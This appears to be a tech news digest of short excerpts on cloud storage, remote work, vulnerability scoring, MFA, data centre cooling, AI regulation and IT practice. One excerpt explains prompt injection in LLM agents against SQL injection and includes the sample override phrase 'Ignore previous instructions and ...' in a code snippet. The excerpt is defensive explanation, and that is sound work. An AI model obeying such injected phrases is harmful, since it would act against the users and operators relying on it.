For the best performance, system architects need to minimise latency between applications and storage. To access cloud storage via the public internet inevitably increases latency. Internet connections are also more prone to variable performance and general reliability issues. This suggests that for best performance, data should be stored on-premise. For the most critical applications, this is still usually the case. But the decision is not always clear cut. “We know that if you start to run compute on a storage bucket across the wire, you are going to have a performance impact,” cautions Paul Mackay, regional vice-president for EMEA and APAC at cloud data firm Cloudera. ... Even so, optimised on-premise storage can still be the cheaper option. As PA’s Gupta points out, much depends on how new the customer’s on-site infrastructure is, and how much life it has left. Cloud storage also has hidden costs. Data egress is frequently cited as a reason for higher than expected bills, but firms can also find they pay more than expected because they store data for extended periods in expensive tiers rather than dedicated cloud archives. Again, careful application design and a clear picture of data use will minimise this.
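The tiering point lends itself to back-of-the-envelope arithmetic. All rates below are hypothetical placeholders, not any provider's actual pricing; the pattern, not the numbers, is what matters:

```python
# Illustrative monthly cost model for cloud storage. Rates are invented
# placeholders ($/GB/month for storage, $/GB for egress), chosen only to
# show how tier choice and egress interact.

def monthly_cost(stored_gb, egress_gb, storage_rate, egress_rate):
    return stored_gb * storage_rate + egress_gb * egress_rate

# Same 50 TB of data and 10 TB of egress, two hypothetical tiers:
hot_tier     = monthly_cost(50_000, 10_000, storage_rate=0.023, egress_rate=0.09)
archive_tier = monthly_cost(50_000, 10_000, storage_rate=0.002, egress_rate=0.09)

# Leaving cold data in an expensive tier inflates the bill even when egress
# is identical -- the "hidden cost" pattern described above.
print(f"hot: ${hot_tier:,.0f}/mo, archive: ${archive_tier:,.0f}/mo")
```

Plugging in real provider rate cards, plus any retrieval fees an archive tier charges, is what a proper comparison requires; the sketch only shows the shape of the calculation.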


Parallels Between Open Source and Fully Remote Team Setups

In open source and remote work, digital communication is the vital link uniting individuals, fostering collaboration and understanding. Beyond information transfer, it builds relationships and transcends cultural differences. Contributors to open source projects come from diverse backgrounds and depend on effective digital communication. Platforms like GitHub offer not just code repositories but crucial discussion spaces. Remote work tools like Slack and Zoom create a virtual office, addressing the challenge of sustaining connections. Clarity counters miscommunication, while video meetings provide a personal touch, supporting empathetic communication. Inclusive digital communication ensures accessibility, involving all contributors. ... Open source communities epitomize meritocracies, fostering diversity and innovation by evaluating contributions solely on merit. In remote work, meritocracy shifts the emphasis from productivity to quality and impact, allowing introverted individuals to shine based on tangible outputs, fostering an objective assessment. While offering advantages, challenges include potential “echo chamber” effects and the risk of overlooking diverse contributions.


The impact of prompt injection in LLM agents

Addressing prompt injection in LLMs presents a distinct set of challenges compared to traditional vulnerabilities like SQL injections. In those scenarios, the structured nature of the language allows for parsing and interpretation into a syntax tree, making it possible to differentiate between the core query (code) and user-provided data, and enabling solutions like parameterized queries to handle user input safely. In contrast, LLMs operate on natural language, where everything is essentially user input with no parsing into syntax trees or clear separation of instructions from data. This absence of a structured format makes LLMs inherently susceptible to injection, as they cannot easily discern between legitimate prompts and malicious inputs. Any defensive and mitigation strategies should be created with the assumption that attackers will eventually be able to inject prompts successfully. First, enforcing stringent privilege controls ensures LLMs can access only the essentials, minimizing potential breach points. We should also incorporate human oversight for critical operations to add a layer of validation to safeguard against unintended LLM actions.
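The contrast with parameterized queries can be made concrete. In the sketch below, the SQL driver treats attacker-controlled input strictly as data, while a prompt is a single undifferentiated string (the prompt text is invented for illustration):

```python
import sqlite3

# SQL separates code from data: the driver binds `malicious` as a literal
# value, so the injection payload never becomes part of the query syntax.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.execute("INSERT INTO users VALUES ('alice')")

malicious = "alice' OR '1'='1"

safe = conn.execute("SELECT * FROM users WHERE name = ?", (malicious,)).fetchall()
assert safe == []  # no row is literally named "alice' OR '1'='1"

# An LLM prompt has no equivalent boundary: trusted instruction and
# untrusted input are concatenated into one natural-language string.
prompt = "Summarize this document: " + "Ignore previous instructions and ..."
# Nothing in `prompt` marks where the instruction ends and the data begins,
# which is why injection cannot simply be parsed away.
```

The `?` placeholder is the structural boundary the paragraph describes; natural language offers no analogue, hence the advice to design as if injection will eventually succeed.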


Navigating cloud concentration and AI lock-in

Although you can choose to reduce the use of a specific cloud provider, it is sometimes nearly impossible to move some applications to other platforms. This is due to the coupling of those applications to the cloud platform and the economic inability to get them off those platforms. To guard against the risks associated with cloud concentration and AI lock-in, IT leaders are exploring strategies to reduce dependency on a single cloud provider. This can include leveraging single-tenant cloud solutions, colocation companies, and hybrid cloud strategies to diversify their cloud deployment and infrastructure. As IT leaders navigate the complex landscape of cloud concentration risks and AI lock-in, it is evident that an agile approach to cloud strategy and AI adoption is mandatory. Organizations can mitigate risks by understanding the nuanced considerations of vendor selection, fostering a multicloud approach, and embracing innovative technologies. At the end of the day, keep your eyes open for the fully optimized solution, and do not focus on just a single cloud provider’s services, including AI.


Will Putting a Dollar Value on Vulnerabilities Help Prioritize Them?

Whether the focus on impact makes VISS any more valuable than other scoring systems is a matter of debate. Any new scoring system should not just replicate what others are already doing, and VISS seems to try to cover some new ground — at least in terms of scope, says Brian Martin, vulnerability historian at Flashpoint, a threat intelligence firm. "Do we need another scoring system? No, but kind of yes," he says. "On one hand, we have too many SSes. We have CVSS version 2, version 3, version 4, we have EPSS, we have the ransomware prediction scoring system — So I'm skeptical, but if it is more direct and to be utilized for a single purpose, such as bug bounties, then I can see it being beneficial." However, companies should not expect prioritizing vulnerabilities using VISS to be any easier than it is with other systems. While VISS may be simpler to calculate, it still requires knowledgeable answers to assign the right level of risk to vulnerabilities, says Tim Jarrett ... "Scoring models are not silver bullets," he says. "You actually have to adopt them and use them and feed them. And I think that what this does not do is make the problem of prioritizing vulnerabilities any less labor intensive."


9 tips for achieving IT service delivery excellence

To achieve maximum efficiency, Cziomer also suggests focusing service efforts on DevOps Research and Assessment (DORA) metrics, such as “lead time for change” and “time to restore service.” Customer-centric Net Promoter Scores are equally important, he adds. “To dive deeper into understanding our services, I employ methods like value stream mapping to pinpoint bottlenecks or inefficiencies,” says Cziomer, who feels that proactive approaches such as these enable IT organizations to consistently elevate their service levels. ... Effective IT service delivery begins by creating and standardizing processes and documentation, says Patrick Cannon, field CTO at data center and cloud services firm US Signal. Standardization ensures a consistent end-user experience with outcomes that adhere to established security policies. “It’s also beneficial for effective training and new IT staff onboarding,” he says, adding that when IT understands the needs of each business unit, it opens the way to a more proactive service approach, reducing downtime and fostering innovation.
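As a minimal sketch of one of those DORA metrics, "lead time for change" is simply the elapsed time from commit to that change running in production; the timestamps below are invented for illustration:

```python
from datetime import datetime

# Compute DORA "lead time for change" from commit and deploy timestamps.
# The two changes below are made-up sample data.

def lead_time_hours(commit_ts: str, deploy_ts: str) -> float:
    fmt = "%Y-%m-%dT%H:%M:%S"
    delta = datetime.strptime(deploy_ts, fmt) - datetime.strptime(commit_ts, fmt)
    return delta.total_seconds() / 3600

changes = [
    ("2023-12-18T09:00:00", "2023-12-18T15:00:00"),  # same-day deploy
    ("2023-12-19T10:00:00", "2023-12-20T10:00:00"),  # next-day deploy
]
lead_times = sorted(lead_time_hours(c, d) for c, d in changes)
print(lead_times)  # [6.0, 24.0]
```

In practice the timestamps would come from the VCS and the deployment pipeline, and teams typically track a median or percentile over a rolling window rather than individual values.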


Architecting for Resilience: Strategies for Fault-Tolerant Systems

A fault-tolerant system can keep working properly even when things go wrong. Faults are any issues that make a system behave differently than expected. Faults can be caused by hardware failure, software bugs, human errors, or environmental factors like power outages. And in complex systems with many services and sub-services, hundreds of servers, distributed across different data centers, minor issues happen all the time. ... Testing plays a key role in building resilient, fault-tolerant systems. Testing helps identify and address potential weaknesses before they cause real failures or outages. There are various testing methods focused on resilience, including chaos engineering, stress testing, and load testing. These techniques simulate realistic failure scenarios like hardware crashes, traffic spikes, or database overloads. The goal is to observe how the system responds and find ways to improve fault tolerance. Testing validates whether redundancy, failover, replication, and other strategies work as intended. All big IT companies practice resilience testing. And Netflix is leading here.
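A toy version of such a resilience test can be written in a few lines: inject faults into a simulated service and check that a retry-with-backoff policy still yields a result. The failure rate and the service itself are simulated assumptions, not real infrastructure:

```python
import random
import time

# Fault-injection sketch in the spirit of chaos engineering: the "service"
# fails randomly, and a retry-with-exponential-backoff wrapper is verified
# to tolerate those injected faults.

def flaky_service(fail_rate: float) -> str:
    if random.random() < fail_rate:
        raise ConnectionError("simulated fault")
    return "ok"

def call_with_retries(attempts: int = 5, base_delay: float = 0.01) -> str:
    for attempt in range(attempts):
        try:
            return flaky_service(fail_rate=0.5)
        except ConnectionError:
            time.sleep(base_delay * 2 ** attempt)  # exponential backoff
    raise RuntimeError("service unavailable after retries")

random.seed(42)  # deterministic for the demo
print(call_with_retries())  # prints "ok" despite a 50% fault rate
```

Real chaos experiments do the same thing at system scale: kill instances or degrade networks deliberately, then verify that redundancy and failover absorb the damage.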



Quote for the day:

"Perhaps the ultimate test of a leader is not what you are able to do in the here and now - but instead what continues to grow long after you're gone" -- Tom Rath

Daily Tech Digest - December 18, 2023

How to Select the Right Industry Cloud for Your Business

One of the biggest mistakes IT leaders make when shopping for an industry cloud is searching for a solution without first constructing a holistic strategy, Campbell says. He recommends focusing on areas that will maximize the overall investment value, including data management and security operations, while ensuring both business and IT buy-in. Due to multiple factors, including compliance, business continuity, customer trust, and financial health, cybersecurity should be a central consideration when assessing industry clouds, says Nigel Gibbons, a director and partner with cyber threat consultancy NCC Group. ... Gibbons adds that it’s also important to be aware of data sovereignty requirements and the impact of laws on where and how data is stored, particularly for businesses operating internationally. To ensure tight alignment with both present and future business goals it’s important to choose a forward-looking provider, Gibbons says. “It’s essential to future-proof investments by choosing a provider that regularly innovates and updates its offerings.”


What to do when receiving unprompted MFA OTP codes

When receiving an unprompted 2FA code, the account holder should assume their credentials were stolen and log directly into Amazon, without clicking on any links in text messages or emails, to change their password. If that same password is used with any of your other accounts, it should also be changed immediately on those sites. It is also important not to think that since 2FA protected your account, you no longer need to change your password. This is a false sense of security, as threat actors have figured out ways to bypass MFA in the past, so there is no reason to give them the opportunity to do so with your account. Furthermore, while SMS and email 2FA provide extra protection to your accounts, they are the riskiest MFA methods to use. This is because if someone gains access to your email or phone number, such as through a SIM swapping attack, they'll also have access to your OTP codes. This would allow them to reset your password without you knowing until it was too late. Instead, if a site provides support for authentication apps, hardware security keys, or passkeys, you should use one of those options, as they’ll require attackers to have access to your device to pass the multi-factor authentication challenge.
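The reason authenticator apps resist SIM swapping is that the code is computed on-device from a shared secret and the current time (the TOTP scheme of RFC 6238); nothing travels over SMS or email. A minimal sketch, with a made-up example secret:

```python
import base64
import hashlib
import hmac
import struct
import time

# Minimal TOTP (RFC 6238) sketch: HMAC-SHA1 over a time-step counter,
# dynamically truncated to a 6-digit code. The base32 secret below is a
# made-up example, not a real credential.

def totp(secret_b32: str, period: int = 30, digits: int = 6) -> str:
    key = base64.b32decode(secret_b32)
    counter = int(time.time()) // period           # 30-second time step
    msg = struct.pack(">Q", counter)               # big-endian 8-byte counter
    digest = hmac.new(key, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                     # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # 6-digit code, changes every 30 seconds
```

Because server and app each derive the code locally from the shared secret, there is no code in transit for an attacker who has hijacked your phone number to intercept.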


Chilling on the Edge: Navigating the challenges of cooling Edge data centers

“In order to manage the complete value supply chain for critical Edge applications, service support is critical for our end user customers. Our products are designed with full consideration of service access and maintenance processes,” he adds. With the global warming phenomenon, summer ambient temperatures are rising globally, with the UK even seeing thermometers reaching 40 degrees Celsius in some parts in recent times. “The result is that design considerations for standard products require a summer ambient operation up to 50 degrees ambient in most markets now. This can be exacerbated when we take into account microclimates, where you have a large population of equipment working together, further increasing the local ambient temperature” says Ansari. Increasingly, he adds, greenfield sites are also abandoning raised floor designs in favour of maximising the indoor cooling space and creating a larger floor-to-ceiling area. “This seems to have become the norm for Edge and, increasingly for colo,” he adds. “This is ideal for our latest fan wall cooling range, AireWall ONE™, which is a parametric design suitable for horizontal airflow and configurable to maximise design options,” says Ansari.


EU AI Act agreed: 5 key considerations for businesses for the road ahead

A company may use AI in a variety of ways, such uses falling into different risk-based categories under the AI Act. Therefore, a ‘one size fits all’ AI governance strategy may not be appropriate. When structuring an AI governance team, businesses should consider including individuals from a range of existing teams to ensure that the requirements of the AI Act can be fully met. For example, although certain requirements will be familiar to privacy teams (e.g. risk and impact assessments), when it comes to AI there is a level of technical knowledge needed relating to testing and monitoring of systems, oversight and transparency requirements. ... The AI Act will not exist in a vacuum and is not the beginning and end for AI governance. It must be read alongside other laws in the regulatory landscape e.g. GDPR. The interplay with privacy is clear, given that data is at the heart of AI systems. This inextricable link is demonstrated by, for example, the provisions in the GDPR on automated decision-making. Earlier this month we saw the first judgment where the CJEU interpreted Article 22 GDPR when deciding what constitutes ‘automated decision-making’


Unpacking The Rise of AI: Its Potential, Its Disruptions, and What It Entails in the Near Future

The timely and cost-effective results produced by AI have already made a host of businesses replace their human resources with technology, while many others have started contemplating the same. One of the recent examples is the replacement of humans with bots in customer service by businesses mainly to save costs and redirect them towards their core business. AI-driven tools are also better equipped to study customer feedback and aid businesses and business leaders in identifying customer preferences and making informed decisions. Meanwhile, AI has also found its way into the healthcare and finance sectors. In healthcare, AI has improved diagnostics, personalised treatment plans, and drug discovery, fostering more effective and targeted medical interventions. In finance, AI algorithms analyse vast datasets to enhance decision-making, risk management, and fraud detection. Moreover, according to Goldman Sachs, about 300 million people could potentially lose their jobs due to automation and technologies like generative AI. Consequently, there are concerns among professionals and aspiring students about the potential automation within their domains and the resultant loss of work.


Surviving the cyber arms race in the age of generative AI

It's critical that industry and government continually evaluate the guardrails in place to protect the public from unrestrained use of AI, whether by cybercriminals or established organizations. The EO promises to develop standards that will ensure AI systems are safe and tested against a rigorous set of qualifications. These qualifications and standards will require refinement over time to become truly standardized. The US Department of Commerce will also develop guidance for watermarking and content authentication to clearly label AI-generated content, while companies like Alphabet, Meta, and OpenAI have already made commitments to implement such measures. This approach echoes how the US Secret Service got manufacturers of color copiers and printers to include digital watermarks on printed pages after the copiers became advanced enough to counterfeit money. However, watermarking brings its own unique set of challenges, as bad actors may find ways to evade or misuse it. To ensure the responsible development and deployment of AI technologies, the evolution of our legislative framework must continue. With transparency, visibility, and understanding as cornerstones, the tech industry and government can work together to mitigate risk and counteract threats.


Building A Lasting Data Management Strategy Requires A Data-First Mindset

Without the data owners' participation, this project won't work. They're the experts in the processes underpinned by the data, whether it’s procurement, marketing, production or another department. They bring a functional view to the project. The migration is just a means to an end. If you don’t do it in the context of the business process, you’re just moving ones and zeros. There’s no value creation. The other side of the coin is the technical people, those who work closely with the line of business owners to execute the migration. These are the IT people who understand the tools, the steps and what needs to happen next. ... As IT and business teams struggle to do more with less, there'll be increased pressure to make the ROI case even before purchasing new tools. Historically, there's been a missing link between tool implementation and recognition at the executive level of the tool’s importance. Data management is a technical challenge for many enterprises, one that's primarily internal. Poor governance and a lack of monitoring are the primary factors cited as the causes of faulty data. As a result, the opportunity resides in a more comprehensive grasp of data and a more potent means of driving change so that data matches up with corporate goals.


9 ways to keep your developer team happy

Good feedback is important in any type of job, and software development is no different. Programmers want to know how they are doing and what they could do to improve. Developers also want to know whether the products they create are beneficial to users and profitable for their companies. An important part of feedback is recognition. This can be informal, such as a team leader paying a compliment for a successful project, or formal, such as a reward or perk for work well done. Public recognition among peers is also important. “Regular recognition and constructive feedback for their contributions are essential for a developer's happiness,” James says. “Feeling appreciated and acknowledged for their hard work and expertise can significantly boost job satisfaction.” ... Developers want to work on projects that push the edge of innovation, such as software that leverages AI and machine learning capabilities. They also want to build products that make a difference. Knowing that their organization stands out in the market is a source of pride and satisfaction. Developers "feel happy when they are allowed to work on innovative solutions,” says Vinika Garg, COO of Webomaze, an SEO agency.


The Three Most Important Emerging AI Trends in Data Analytics

As AI-enabled applications performing analytics are spun up, it is increasingly critical that the training and production data sets are unbiased and incorruptible. Bad training or production data sets that are biased or just out of date can lead the system to make bad recommendations and worse decisions. Ensuring the safety of the data includes a legal process (asking the firm to guarantee that the data in the repository isn’t owned by someone else who might take exception to its use) and some form of indemnification. The use of indemnification isn’t consistent, however, with some of the more mature firms indemnifying their customers and some of the other firms asking for indemnification from their customers. ... AI is very expensive to run in the cloud because it uses substantial processing and storage resources. However, if you can shift the load to the client, it frees up those resources and allows for faster results with some loss of trainability and customization as, typically, the clients use a compressed data set and inferencing that is more limited than the capabilities of a cloud implementation. 


Creating a formula for effective vulnerability prioritization

Systems should operate continuously and collect live data to drive vulnerability prioritization efforts based on actual usage. Traditional vulnerability systems, on the other hand, typically collect information periodically – on-demand, weekly, and even monthly. However, the lack of current exposure context can lead to resourcing and security gaps. This causes a significant human resource overhead and creates security gaps since the information doesn’t present a current map of the organization’s exposure. Automated and continuous prioritization adapts to a dynamically changing attack surface. In turn, teams gain greater accuracy with less reliance on manual data collection and analysis. Automated systems allow for greater capacity to digest more (and higher priority) data and better leverage existing resources. In parallel, organizations should consider deploying patchless protection to reduce their attack surface until patches are deployed. Patchless protection protects known vulnerabilities that haven’t been patched yet while preventing unknown vulnerabilities from causing damage.
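One way to picture exposure-aware prioritization is a score that boosts static severity with live context. The field names and weights below are illustrative assumptions, not a standard formula:

```python
# Hedged sketch of exposure-aware vulnerability prioritization: combine a
# static severity score with live context (is the vulnerable component
# actually loaded? is it reachable from the internet?). Weights and field
# names are illustrative assumptions, not any published scoring system.

def priority(vuln: dict) -> float:
    score = vuln["cvss"]                # static severity, 0-10
    if vuln["in_use"]:                  # component loaded in production
        score *= 1.5
    if vuln["internet_facing"]:         # reachable from outside
        score *= 1.5
    return min(score, 10.0)            # cap at the familiar 0-10 range

vulns = [
    {"id": "CVE-A", "cvss": 9.8, "in_use": False, "internet_facing": False},
    {"id": "CVE-B", "cvss": 6.5, "in_use": True,  "internet_facing": True},
]
ranked = sorted(vulns, key=priority, reverse=True)
print([v["id"] for v in ranked])  # live exposure outranks raw CVSS here
```

The point of continuous collection is that `in_use` and `internet_facing` are facts that change hourly; a score computed from a monthly scan would rank on stale context.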



Quote for the day:

“If you don’t value your time, neither will others. Stop giving away your time and talents. Value what you know & start charging for it.” -- Kim Garst